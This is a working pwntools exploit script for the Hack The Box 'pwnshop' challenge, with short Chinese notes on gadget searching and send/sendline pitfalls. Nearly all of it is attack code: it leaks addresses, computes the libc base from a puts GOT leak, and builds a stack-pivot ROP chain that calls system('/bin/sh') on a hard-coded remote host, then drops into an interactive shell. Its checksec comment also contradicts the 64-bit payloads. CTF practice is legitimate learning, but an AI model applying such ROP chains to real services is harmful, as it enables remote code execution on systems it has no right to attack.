HTB pwnshop

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# This exploit template was generated via:

# $ pwn template --host 167.99.88.212 --port 31369 space

from pwn import *

from pwnlib import libcdb

# Set up pwntools for the correct architecture

exe = context.binary = ELF('/root/hackthebox/tracker/pwnshop')

# Many built-in settings can be controlled on the command-line and show up

# in "args".  For example, to dump all data sent/received, and disable ASLR

# for all created processes...

# ./exploit.py DEBUG NOASLR

# ./exploit.py GDB HOST=example.com PORT=4141

host = args.HOST or '46.101.23.188'

port = int(args.PORT or 30327)

def local(argv=[], *a, **kw):

    '''Execute the target binary locally'''

    if args.GDB:

        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)

    else:

        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):

    '''Connect to the process on the remote host'''

    io = connect(host, port)

    if args.GDB:

        gdb.attach(io, gdbscript=gdbscript)

    return io

def start(argv=[], *a, **kw):

    '''Start the exploit against the target.'''

    if args.LOCAL:

        return local(argv, *a, **kw)

    else:

        return remote(argv, *a, **kw)

def leakdataaddr():

    io.sendlineafter("> ","2")

    io.sendlineafter("sell? ",b'zzq')

    io.sendafter("it? ",b'11111111')

    ret = io.recvline()

    #what? 11111111

    start=14

    #%s?

    end=ret.index(b'?',start)

    addr=ret[start:end]

    addr_int=int.from_bytes( addr, byteorder='little')

    data_segment=addr_int-0xc0

    print(hex(data_segment))

    return data_segment

def leakputsaddr():

    io.sendlineafter("> ","1")

    payload = b'a'*0x28

    payload += p64(pop_rdi_ret)

    payload += p64(puts_got)

    payload += p64(puts_plt)

    payload += p64(loop_addr)

    payload += p64(sub_rsp_ret)

    io.sendafter("details: ",payload)

    ret=io.recvline()

    ret=ret[0:-1]

    puts_addr=int.from_bytes( ret, byteorder='little', signed=False)

    print(hex(puts_addr))

    return puts_addr

def getshell():

    io.sendlineafter("> ","1")

    payload = b'a'*0x28

    payload += p64(pop_rdi_ret)

    payload += p64(str_binsh_addr)

    payload += p64(system_addr)

    payload += b'a'*0x8

    payload += p64(sub_rsp_ret)

    io.sendlineafter("details: ",payload)

    sleep(1)

    io.interactive()

    print('aa')

# Specify your GDB script here for debugging

# GDB will be launched if the exploit is run via e.g.

# ./exploit.py GDB

gdbscript = '''

tbreak main

continue

'''.format(**locals())

#===========================================================

#                    EXPLOIT GOES HERE

#===========================================================

# Arch:    i386-32-little

# RELRO:    No RELRO

# Stack:    No canary found

# NX:      NX disabled

# PIE:      No PIE (0x8048000)

# RWX:      Has RWX segments

io = start()

data_addr=leakdataaddr()

entry_addr=data_addr-0x4000

exe.address=entry_addr

main_addr = 0x10A0+entry_addr

buy_addr = 0x132A+entry_addr

loop_addr = 0x10BD+entry_addr

#sub rsp, 0x28 ; ret

sub_rsp_ret=0x1219 + entry_addr

pop_rdi_ret=0x13c3 + entry_addr

puts_plt=exe.plt['puts']

puts_got=exe.got['puts']

puts_addr=leakputsaddr()

puts_offset=0x6f6a0

libc_addr=puts_addr-puts_offset

system_addr = 0x453a0 + libc_addr

str_binsh_addr= 0x18ce17 + libc_addr

getshell()

这题难度没那么高，却暴露知识盲点

只有buy()函数 8bytes ret地址的overwrite，一个单位地址，不能直接在stack上写rop

1.ROPgadget ，用--only'sub|ret' 找不到 sub rsp,xxx gadgets，不加 --only，默认返回所以的gadgets。

2.开始想用ret2dlresolve，把dlresolve写进数据段，后面发现payload有0x50，代码限制只能写0x40。

3.还是sendline()月send造成的困惑，leakputsaddr（）多写一个\n，造成getshell()接收字节出错。